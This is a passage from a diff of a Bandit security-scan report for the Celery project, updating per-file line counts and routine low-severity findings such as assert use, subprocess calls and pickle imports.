+ "loc": 174,
"nosec": 0
},
"celery/backends/consul.py": {
@@ -395,7 +383,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 74,
+ "loc": 79,
"nosec": 0
},
"celery/backends/cosmosdbsql.py": {
@@ -419,7 +407,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 85,
+ "loc": 79,
"nosec": 0
},
"celery/backends/couchdb.py": {
@@ -431,7 +419,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 77,
"nosec": 0
},
"celery/backends/database/__init__.py": {
@@ -467,7 +455,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 47,
+ "loc": 68,
"nosec": 0
},
"celery/backends/dynamodb.py": {
@@ -503,7 +491,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 89,
"nosec": 0
},
"celery/backends/mongodb.py": {
@@ -515,7 +503,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 241,
+ "loc": 243,
"nosec": 0
},
"celery/backends/redis.py": {
@@ -527,19 +515,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 448,
- "nosec": 0
- },
- "celery/backends/riak.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 105,
+ "loc": 499,
"nosec": 0
},
"celery/backends/rpc.py": {
@@ -563,19 +539,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 65,
+ "loc": 66,
"nosec": 0
},
"celery/beat.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 553,
+ "loc": 567,
"nosec": 0
},
"celery/bin/__init__.py": {
@@ -599,7 +575,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 268,
+ "loc": 274,
"nosec": 0
},
"celery/bin/base.py": {
@@ -611,7 +587,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 180,
+ "loc": 219,
"nosec": 0
},
"celery/bin/beat.py": {
@@ -623,7 +599,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 58,
+ "loc": 63,
"nosec": 0
},
"celery/bin/call.py": {
@@ -635,7 +611,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 66,
+ "loc": 69,
"nosec": 0
},
"celery/bin/celery.py": {
@@ -647,7 +623,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 127,
+ "loc": 176,
"nosec": 0
},
"celery/bin/control.py": {
@@ -659,7 +635,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 164,
+ "loc": 181,
"nosec": 0
},
"celery/bin/events.py": {
@@ -671,7 +647,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 79,
"nosec": 0
},
"celery/bin/graph.py": {
@@ -683,7 +659,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 157,
+ "loc": 162,
"nosec": 0
},
"celery/bin/list.py": {
@@ -695,7 +671,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 25,
+ "loc": 28,
"nosec": 0
},
"celery/bin/logtool.py": {
@@ -707,7 +683,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 125,
"nosec": 0
},
"celery/bin/migrate.py": {
@@ -719,7 +695,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 54,
+ "loc": 57,
"nosec": 0
},
"celery/bin/multi.py": {
@@ -731,7 +707,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 372,
+ "loc": 375,
"nosec": 0
},
"celery/bin/purge.py": {
@@ -743,7 +719,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 55,
+ "loc": 60,
"nosec": 0
},
"celery/bin/result.py": {
@@ -755,7 +731,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 22,
+ "loc": 25,
"nosec": 0
},
"celery/bin/shell.py": {
@@ -767,7 +743,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 143,
+ "loc": 144,
"nosec": 0
},
"celery/bin/upgrade.py": {
@@ -779,7 +755,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 69,
+ "loc": 74,
"nosec": 0
},
"celery/bin/worker.py": {
@@ -791,7 +767,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 306,
"nosec": 0
},
"celery/bootsteps.py": {
@@ -815,7 +791,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 1113,
+ "loc": 1143,
"nosec": 0
},
"celery/concurrency/__init__.py": {
@@ -827,7 +803,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 19,
+ "loc": 22,
"nosec": 0
},
"celery/concurrency/asynpool.py": {
@@ -863,7 +839,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 114,
+ "loc": 145,
"nosec": 0
},
"celery/concurrency/gevent.py": {
@@ -887,7 +863,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 131,
+ "loc": 132,
"nosec": 0
},
"celery/concurrency/solo.py": {
@@ -911,7 +887,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 33,
+ "loc": 30,
"nosec": 0
},
"celery/contrib/__init__.py": {
@@ -959,7 +935,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 146,
+ "loc": 153,
"nosec": 0
},
"celery/contrib/rdb.py": {
@@ -1019,7 +995,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 175,
+ "loc": 176,
"nosec": 0
},
"celery/contrib/testing/mocks.py": {
@@ -1055,7 +1031,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 130,
+ "loc": 141,
"nosec": 0
},
"celery/events/__init__.py": {
@@ -1139,7 +1115,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 87,
+ "loc": 88,
"nosec": 0
},
"celery/events/state.py": {
@@ -1151,7 +1127,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 569,
+ "loc": 570,
"nosec": 0
},
"celery/exceptions.py": {
@@ -1163,19 +1139,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 186,
- "nosec": 0
- },
- "celery/five.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 4,
+ "loc": 196,
"nosec": 0
},
"celery/fixups/__init__.py": {
@@ -1235,7 +1199,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 202,
+ "loc": 204,
"nosec": 0
},
"celery/loaders/default.py": {
@@ -1259,7 +1223,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 426,
+ "loc": 404,
"nosec": 0
},
"celery/platforms.py": {
@@ -1271,7 +1235,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 623,
+ "loc": 631,
"nosec": 0
},
"celery/result.py": {
@@ -1283,7 +1247,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 866,
+ "loc": 843,
"nosec": 0
},
"celery/schedules.py": {
@@ -1382,30 +1346,6 @@
"loc": 95,
"nosec": 0
},
- "celery/task/__init__.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 39,
- "nosec": 0
- },
- "celery/task/base.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 184,
- "nosec": 0
- },
"celery/utils/__init__.py": {
"CONFIDENCE.HIGH": 0.0,
"CONFIDENCE.LOW": 0.0,
@@ -1439,7 +1379,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 611,
+ "loc": 595,
"nosec": 0
},
"celery/utils/debug.py": {
@@ -1490,18 +1430,6 @@
"loc": 262,
"nosec": 0
},
- "celery/utils/encoding.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 5,
- "nosec": 0
- },
"celery/utils/functional.py": {
"CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
@@ -1511,7 +1439,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 261,
+ "loc": 290,
"nosec": 0
},
"celery/utils/graph.py": {
@@ -1535,7 +1463,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 115,
"nosec": 0
},
"celery/utils/iso8601.py": {
@@ -1559,7 +1487,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 215,
"nosec": 0
},
"celery/utils/nodenames.py": {
@@ -1595,7 +1523,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 188,
+ "loc": 190,
"nosec": 0
},
"celery/utils/serialization.py": {
@@ -1607,7 +1535,7 @@
"SEVERITY.LOW": 4.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 209,
"nosec": 0
},
"celery/utils/static/__init__.py": {
@@ -1655,7 +1583,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 135,
+ "loc": 136,
"nosec": 0
},
"celery/utils/threads.py": {
@@ -1775,7 +1703,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 470,
+ "loc": 493,
"nosec": 0
},
"celery/worker/consumer/control.py": {
@@ -1859,7 +1787,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 423,
+ "loc": 424,
"nosec": 0
},
"celery/worker/heartbeat.py": {
@@ -1883,7 +1811,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 79,
+ "loc": 92,
"nosec": 0
},
"celery/worker/pidbox.py": {
@@ -1907,19 +1835,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 536,
+ "loc": 578,
"nosec": 0
},
"celery/worker/state.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 200,
+ "loc": 208,
"nosec": 0
},
"celery/worker/strategy.py": {
@@ -1931,7 +1859,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 166,
+ "loc": 175,
"nosec": 0
},
"celery/worker/worker.py": {
@@ -1963,353 +1891,369 @@
"test_name": "blacklist"
},
{
- "code": "196 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n197 pipe = Popen(argstr, env=env)\n198 return self.handle_process_exit(\n",
+ "code": "216 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n217 pipe = Popen(argstr, env=env)\n218 return self.handle_process_exit(\n",
"filename": "celery/apps/multi.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "subprocess call - check for execution of untrusted input.",
- "line_number": 197,
+ "line_number": 217,
"line_range": [
- 197
+ 217
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b603_subprocess_without_shell_equals_true.html",
"test_id": "B603",
"test_name": "subprocess_without_shell_equals_true"
},
{
- "code": "322 ])\n323 os.execv(sys.executable, [sys.executable] + sys.argv)\n324 \n",
+ "code": "341 ])\n342 os.execv(sys.executable, [sys.executable] + sys.argv)\n343 \n",
"filename": "celery/apps/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 323,
+ "line_number": 342,
"line_range": [
- 323
+ 342
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "74 self.set(key, b'test value')\n75 assert self.get(key) == b'test value'\n76 self.delete(key)\n",
+ "code": "72 self.set(key, b'test value')\n73 assert self.get(key) == b'test value'\n74 self.delete(key)\n",
"filename": "celery/backends/filesystem.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 75,
+ "line_number": 73,
"line_range": [
- 75
+ 73
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "89 path = executable\n90 os.execv(path, [path] + argv)\n91 except Exception: # pylint: disable=broad-except\n",
+ "code": "6 import os\n7 import shelve\n8 import sys\n",
+ "filename": "celery/beat.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 7,
+ "line_range": [
+ 7
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
+ },
+ {
+ "code": "124 path = executable\n125 os.execv(path, [path] + argv)\n126 return EX_OK\n",
"filename": "celery/bin/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 90,
+ "line_number": 125,
"line_range": [
- 90
+ 125
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "23 from numbers import Integral\n24 from pickle import HIGHEST_PROTOCOL\n25 from time import sleep\n",
+ "code": "22 from numbers import Integral\n23 from pickle import HIGHEST_PROTOCOL\n24 from struct import pack, unpack, unpack_from\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with HIGHEST_PROTOCOL module.",
- "line_number": 24,
+ "line_number": 23,
"line_range": [
- 24
+ 23
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "613 proc in waiting_to_start):\n614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n",
+ "code": "607 proc in waiting_to_start):\n608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 614,
+ "line_number": 608,
"line_range": [
- 614
+ 608
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n",
+ "code": "608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 615,
+ "line_number": 609,
"line_range": [
- 615
+ 609
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n617 error('Timed out waiting for UP message from %r', proc)\n",
+ "code": "609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n611 error('Timed out waiting for UP message from %r', proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 616,
+ "line_number": 610,
"line_range": [
- 616
+ 610
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "636 \n637 assert not isblocking(proc.outq._reader)\n638 \n639 # handle_result_event is called when the processes outqueue is\n640 # readable.\n641 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
+ "code": "630 \n631 assert not isblocking(proc.outq._reader)\n632 \n633 # handle_result_event is called when the processes outqueue is\n634 # readable.\n635 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 637,
+ "line_number": 631,
"line_range": [
- 637,
- 638,
- 639,
- 640
+ 631,
+ 632,
+ 633,
+ 634
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1090 synq = None\n1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n",
+ "code": "1088 synq = None\n1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1091,
+ "line_number": 1089,
"line_range": [
- 1091
+ 1089
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n",
+ "code": "1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1092,
+ "line_number": 1090,
"line_range": [
- 1092
+ 1090
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n",
+ "code": "1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1093,
+ "line_number": 1091,
"line_range": [
- 1093
+ 1091
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n1095 if self.synack:\n",
+ "code": "1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n1093 if self.synack:\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1094,
+ "line_number": 1092,
"line_range": [
- 1094
+ 1092
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1096 synq = _SimpleQueue(wnonblock=True)\n1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n",
+ "code": "1094 synq = _SimpleQueue(wnonblock=True)\n1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1097,
+ "line_number": 1095,
"line_range": [
- 1097
+ 1095
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n1099 return inq, outq, synq\n",
+ "code": "1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n1097 return inq, outq, synq\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1098,
+ "line_number": 1096,
"line_range": [
- 1098
+ 1096
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1109 return logger.warning('process with pid=%s already exited', pid)\n1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n",
+ "code": "1107 return logger.warning('process with pid=%s already exited', pid)\n1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1110,
+ "line_number": 1108,
"line_range": [
- 1110
+ 1108
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n1112 self._waiting_to_start.discard(proc)\n",
+ "code": "1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n1110 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1111,
+ "line_number": 1109,
"line_range": [
- 1111
+ 1109
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1189 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1190 assert queues in self._queues\n1191 b = len(self._queues)\n",
+ "code": "1187 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1188 assert queues in self._queues\n1189 b = len(self._queues)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1190,
+ "line_number": 1188,
"line_range": [
- 1190
+ 1188
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1192 self._queues[queues] = proc\n1193 assert b == len(self._queues)\n1194 \n",
+ "code": "1190 self._queues[queues] = proc\n1191 assert b == len(self._queues)\n1192 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1193,
+ "line_number": 1191,
"line_range": [
- 1193
+ 1191
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1272 pass\n1273 assert len(self._queues) == before\n1274 \n",
+ "code": "1270 pass\n1271 assert len(self._queues) == before\n1272 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1273,
+ "line_number": 1271,
"line_range": [
- 1273
+ 1271
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1279 \"\"\"\n1280 assert not proc._is_alive()\n1281 self._waiting_to_start.discard(proc)\n",
